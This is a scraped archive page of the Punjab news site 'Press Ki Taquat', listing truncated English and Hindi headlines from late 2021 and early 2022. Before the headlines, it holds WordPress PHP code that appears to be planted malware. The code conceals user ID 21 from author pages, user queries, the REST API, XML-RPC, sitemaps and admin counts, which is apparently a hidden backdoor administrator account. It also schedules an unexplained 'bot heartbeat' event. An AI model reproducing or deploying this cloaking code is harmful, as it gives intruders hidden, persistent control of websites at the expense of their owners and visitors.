add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
Top 10 Headlines Archives - Page 3 of 10 - Press Ki Taquat
No Result
View All Result
Chandigarh, 4 January 2022, (Press Ki Taquat Bureau)- In a bid to check menace of stray cattle and ensure its ...
Phagwara (Kapurthala), 4 January 2022, (Press Ki Taquat Bureau)- Punjab Chief Minister Charanjit Singh Channi on Tuesday announced to provide ...
दिल्ली, 4 जनवरी, 2022, (प्रेस की ताकत ब्यूरो)- प्रधान मंत्री, श्री नरेंद्र मोदी 5 जनवरी, 2022 को फ़िरोज़पुर, पंजाब का ...
Chandigarh, 28 December 2021, (Press Ki Taquat Bureau)- After marathon discussion with Kisan Majdoor Sangharsh Committee, Punjab Chief Minister Charanjit ...
सरदूलगढ़, 28 दिसंबर 2021, (प्रेस की ताकत ब्यूरो)- पंजाब के मुख्यमंत्री चरणजीत सिंह चन्नी ने आप सुप्रीमो अरविन्द केजरीवाल पर ...
सुनाम ऊधम सिंह वाला, 28 दिसंबर 2021, पंजाब के मुख्यमंत्री चरणजीत सिंह चन्नी ने आज कहा कि अगर जलियांवाला हत्याकांड ...
नई दिल्ली, 28 दिसंबर 2021, (प्रेस की ताकत ब्यूरो)- देश के कई राज्यों में मौसम ने करवट ली है। बरसात ...
नई दिल्ली, 28 दिसंबर 2021, (प्रेस की ताकत ब्यूरो)- पूर्व क्रिकेटर दिनेश मोंगिया अपनी राजनैतिक पारी की शुरूआत करते मंगलवार ...
नई दिल्ली, 28 दिसंबर 2021, (प्रेस की ताकत ब्यूरो)- दिल्ली के मुख्य मंत्री अरविन्द केजरीवाल का कहना है कि दिल्ली ...
चण्डीगढ़, 28 दिसंबर 2021, (प्रेस की ताकत ब्यूरो)- पंजाब कैबिनेट की अहम बैठक मंगलवार को मुख्य मंत्री चरनजीत सिंह चन्नी ...
No Result
View All Result